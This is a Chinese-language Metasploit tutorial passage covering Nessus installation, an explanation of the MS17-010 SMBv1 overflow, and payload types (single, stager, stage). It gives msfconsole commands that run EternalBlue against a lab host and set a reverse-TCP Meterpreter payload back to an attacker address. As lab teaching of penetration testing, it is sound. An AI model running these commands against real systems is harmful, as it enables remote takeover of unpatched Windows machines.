Metasploit 进阶第三讲

深入理解攻击载荷

01 Nesus介绍、安装及使用

Nessus介绍

Nessus是一款著名的漏洞扫描及分析工具，提供完整的漏洞扫描服务，并随时更新漏洞数据库。

采用B/S模式，服务器端负责执行具体的扫描任务，客户端负责管理配置服务器端，在服务器端还采用plug-in体系，支持客户端加入自定义插件，其运作效能随系统资源而自行调整。

Nessus安装&使用

1.https://www.tenable.com/downloads/nessus              ->Nessus下载、获取激活码

2.dpkg  -I  Nessus-8.3.1-debian6_amd64/i386.deb             ->Nessus安装

3./etc/init.d/nessusd start             ->Nessus服务器端启动

Register for an Activation Co

4.https://127.0.0.1：8834/                 ->客户端访问（添加例外）获取激活码：

https://www.tenable.com/products/nessus-home

实操：利用ms2017-010攻击目标主机

ms17-010漏洞出现在Windows SMBv1中的内核态函数srv4SrvOs2FeaListToNt。

在将FEA list转换成NTFEA（Windows NT FEA）list前会调用srv.SrvOs2FeaListSizeToNt去计算转换后的FEAlist的大小，因计算大小错误，而导致缓冲区溢出。

Msfconsole

Search  ms17-010

use exploit/windows/smb/ms17_010_eternalblue

set        rhosts   192.168.24.142

show    payloads

set        payload  windows/x64/meterpreter/reverse_tcp

set  lhost  192.168.24.137

run

深入理解payload

payload是什么？

payload字面意思是有效攻击载荷，包含需要在远程主机上运行的恶意代码。

payload和exploit的区别？

exploit是传送系统（运载火箭），payload是用来实际做什么事的代码（弹头）

payload命名规则：

Staged payload：<platform>/[archl/stage>/<stager>

Single payload：<platform>/[arch]/ssingle>

其中arch可选，因为不必要或已默认，如：php/meterpreter/reverse_tcp

payload的分类：

single、stager、stage三种。其中：

single：是一种完全独立的Payload。如：meterpreter_reverse_tcp

stager：负责建立目标用户与攻击者之间的网络连接，将执行传递到另一个阶段。

如：reverse_tcp、bind_tcp

作用：

1.允许我们使用较小的有效载荷去加载具有更多功能的较大的payload。

2.使通信机制与最终阶段分离成为可能。

stage：提供更高级的功能，且没有大小限制（因为stager为stage分配了大量内存）

如：meterpreter

stager和stage就像web入侵里面提到的小马和大马一样，由于exploit环境的限制，可能不能一下子把stage传过去，需要先传一个stager，stager在attacker和target之间建立网络连接，之后再把stage传过去进行下一步的行动。